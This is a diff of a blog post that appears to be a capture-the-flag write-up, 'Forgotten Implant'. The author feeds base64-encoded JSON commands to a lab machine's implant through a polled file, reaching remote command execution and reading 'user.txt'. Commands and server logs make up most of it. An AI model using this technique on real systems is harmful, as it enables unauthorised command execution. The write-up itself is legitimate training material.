noncenz/noncenz.github.io/_posts/2023-08-01-Forgotten Implant .md

 ┌──(user㉿kali-linux-2022-2)-[~]
 └─$ echo 'ls' > get-job/ImxhdGVzdCI=
 ```
+After a brief wait we see the implant call our file, followed by a second call to a new endpoint `job-result`!

 ```bash
 10.10.115.84 - - [02/Aug/2023 17:31:02] "GET /job-result/eyJzdWNjZXNzIjogZmFsc2UsICJyZXN1bHQiOiAiRW5jb2RpbmcgZXJyb3IifQ==
 ```

-now we get `{"success": false, "result": "Encoding error"}`
+Decoding the base 64 we see `{"success": false, "result": "Encoding error"}`

-OK, so it wants b64
+OK, so it wants b64.
+On the next round we send

 `echo 'ls' | base64 > get-job/ImxhdGVzdCI=`

+And get back

 `{"success": false, "result": "JSON error"}`

 Let’s try the JSON format we received in the heartbeat message.
-Submitting
+We submit:

 `echo '{"job_id": 0, "cmd": "ls"}' | base64 > get-job/ImxhdGVzdCI=`

-returns
+and get back

 `{"job_id": 0, "cmd": "ls", "success": true, "result": "products.py\nuser.txt\n"}`

-We've found the first flag already, let's grab it right now!
+We've achieved RCE and found the first flag already, let's grab it right now!

 `echo '{"job_id": 0, "cmd": "cat user.txt"}' | base64 > get-job/ImxhdGVzdCI=`